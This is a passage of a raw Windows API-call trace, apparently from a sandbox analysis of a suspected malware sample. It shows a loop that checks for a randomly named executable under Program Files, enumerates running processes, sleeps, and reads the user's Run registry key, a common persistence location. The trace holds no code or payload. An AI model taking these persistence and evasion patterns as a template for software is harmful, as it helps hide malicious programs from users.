NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0303.244] NtCreateFile (in: FileHandle=0xde840, DesiredAccess=0x120089, ObjectAttributes=0xde808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde840*=0x0, IoStatusBlock=0xde828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0303.244] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x540b90) returned 1 [0303.244] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0xdea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0303.245] NtCreateFile (in: FileHandle=0xdea5c, DesiredAccess=0x120089, ObjectAttributes=0xdea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea5c*=0x0, IoStatusBlock=0xdea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0303.245] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x540f38) returned 1 [0303.245] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0303.245] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0303.248] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0303.248] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0303.249] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0303.256] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0303.257] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0303.259] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x374) returned 0x0 [0303.261] NtEnumerateValueKey (in: KeyHandle=0x374, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0303.261] NtClose (Handle=0x374) returned 0x0 [0303.261] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0xde820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0303.261] NtCreateFile (in: FileHandle=0xde840, DesiredAccess=0x120089, ObjectAttributes=0xde808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde840*=0x0, IoStatusBlock=0xde828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0303.261] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x540a58) returned 1 [0303.261] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0xdea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0303.261] NtCreateFile (in: FileHandle=0xdea5c, DesiredAccess=0x120089, ObjectAttributes=0xdea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea5c*=0x0, IoStatusBlock=0xdea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0303.261] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x5410d8) returned 1 [0303.262] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0303.262] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0303.265] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0303.265] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0303.265] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0303.272] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0303.273] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0303.304] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x374) returned 0x0 [0303.305] NtEnumerateValueKey (in: KeyHandle=0x374, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0303.305] NtClose (Handle=0x374) returned 0x0 [0303.306] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0xde820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0303.306] NtCreateFile (in: FileHandle=0xde840, DesiredAccess=0x120089, ObjectAttributes=0xde808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde840*=0x0, IoStatusBlock=0xde828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0303.306] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x540ac0) returned 1 [0303.306] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0xdea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0303.306] NtCreateFile (in: FileHandle=0xdea5c, DesiredAccess=0x120089, ObjectAttributes=0xdea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea5c*=0x0, IoStatusBlock=0xdea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0303.306] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x541008) returned 1 [0303.306] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0303.306] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0303.309] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0303.310] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0303.310] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0303.316] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0303.317] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0303.321] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x374) returned 0x0 [0303.323] NtEnumerateValueKey (in: KeyHandle=0x374, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0303.323] NtClose (Handle=0x374) returned 0x0 [0303.323] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0xde820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0303.323] NtCreateFile (in: FileHandle=0xde840, DesiredAccess=0x120089, ObjectAttributes=0xde808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde840*=0x0, IoStatusBlock=0xde828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0303.323] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x540e00) returned 1 [0303.323] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0xdea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0303.323] NtCreateFile (in: FileHandle=0xdea5c, DesiredAccess=0x120089, ObjectAttributes=0xdea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea5c*=0x0, IoStatusBlock=0xdea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0303.324] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x540b90) returned 1 [0303.324] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0303.324] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0303.330] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0303.331] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0303.331] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0303.337] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0303.338] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0303.352] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x374) returned 0x0 [0303.354] NtEnumerateValueKey (in: KeyHandle=0x374, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0303.354] NtClose (Handle=0x374) returned 0x0 [0303.354] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0xde820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0303.354] NtCreateFile (in: FileHandle=0xde840, DesiredAccess=0x120089, ObjectAttributes=0xde808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde840*=0x0, IoStatusBlock=0xde828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0303.354] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x540e00) returned 1 [0303.354] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0xdea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0303.354] NtCreateFile (in: FileHandle=0xdea5c, DesiredAccess=0x120089, ObjectAttributes=0xdea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea5c*=0x0, IoStatusBlock=0xdea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0303.354] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x540ac0) returned 1 [0303.354] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0303.355] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0303.357] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0303.358] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0303.358] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0303.363] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0303.365] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0303.376] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x374) returned 0x0 [0303.377] NtEnumerateValueKey (in: KeyHandle=0x374, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0303.378] NtClose (Handle=0x374) returned 0x0 [0303.378] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0xde820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0303.378] NtCreateFile (in: FileHandle=0xde840, DesiredAccess=0x120089, ObjectAttributes=0xde808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde840*=0x0, IoStatusBlock=0xde828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0303.378] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x540ac0) returned 1 [0303.378] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0xdea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0303.378] NtCreateFile (in: FileHandle=0xdea5c, DesiredAccess=0x120089, ObjectAttributes=0xdea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea5c*=0x0, IoStatusBlock=0xdea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0303.378] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x540a58) returned 1 [0303.378] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0303.379] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0303.381] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0303.382] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0303.382] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0303.388] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0303.393] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0303.394] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x374) returned 0x0 [0303.396] NtEnumerateValueKey (in: KeyHandle=0x374, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0303.396] NtClose (Handle=0x374) returned 0x0 [0303.396] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0xde820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0303.396] NtCreateFile (in: FileHandle=0xde840, DesiredAccess=0x120089, ObjectAttributes=0xde808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde840*=0x0, IoStatusBlock=0xde828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0303.397] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x5410d8) returned 1 [0303.397] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0xdea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0303.397] NtCreateFile (in: FileHandle=0xdea5c, DesiredAccess=0x120089, ObjectAttributes=0xdea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea5c*=0x0, IoStatusBlock=0xdea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0303.397] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x540e00) returned 1 [0303.397] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0303.397] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0303.400] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0303.400] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0303.401] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0303.407] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0303.408] NtDelayExecution (Alertable=0, 